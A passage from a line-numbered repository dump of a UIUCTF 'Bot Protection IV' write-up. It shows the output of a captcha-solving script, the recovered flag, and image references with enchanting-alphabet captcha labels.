text](solved.jpg) 97 | 98 | ```python 99 | 100 | Level 497 is not high enough 101 | Invalid captcha 102 | Invalid captcha 103 | Invalid captcha 104 | Invalid captcha 105 | Invalid captcha 106 | Level 498 is not high enough 107 | Level 499 is not high enough 108 | uiuctf{i_knew_a_guy_in_highschool_that_could_read_this} 109 | Traceback (most recent call last): 110 | File "man.py", line 168, in 111 | main() 112 | File "man.py", line 159, in main 113 | lv = int(header.split(" ")[1]) 114 | IndexError: list index out of range 115 | 116 | ``` 117 | 118 | ``` 119 | Flag : uiuctf{i_knew_a_guy_in_highschool_that_could_read_this} 120 | ``` 121 | 122 | ![alt text](12.jpg) 123 | 124 | ⋮⊣⊣ᓭᓭ : 125 | 126 | ![alt text](JGGSS.png) 127 | 128 | ||⋮ꖌ|||| : 129 | 130 | ![alt text](YJKYY.png) 131 | 132 | 133 | ![alt text](13.jpg) 134 | 135 | ||⋮ꖌ|||| : 136 | 137 | ![alt text](YJKYY.png) 138 | 139 | ⋮!¡ᓭᓵʖ : 140 | 141 | ![alt text](JPSCB.png) 142 | 143 | ⎓↸ᓭᒷ⋮ : 144 | 145 | ![alt text](FDSEJ.png) 146 | 147 | ⍊⋮⊣⋮⋮ : 148 | 149 | ![alt text](VJGJJ.png) 150 | 151 | ![alt text](14.jpg) 152 | 153 | ![alt text](PTJYZ.png) 154 | 155 | ![alt text](15.jpg) 156 | 157 | ![alt text](failure.jpg) 158 | 159 | 160 | T⍑ᔑリꖌᓭ ⎓𝙹∷ ∷ᒷᔑ↸╎リ⊣ ⚍リℸ ̣ ╎ꖎ ⍑ᒷ∷ᒷ :) 161 | -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/solved.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/solved.jpg -------------------------------------------------------------------------------- /web/UIUCTF/Bot_Protection_IV/unzip.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/web/UIUCTF/Bot_Protection_IV/unzip.jpg --------------------------------------------------------------------------------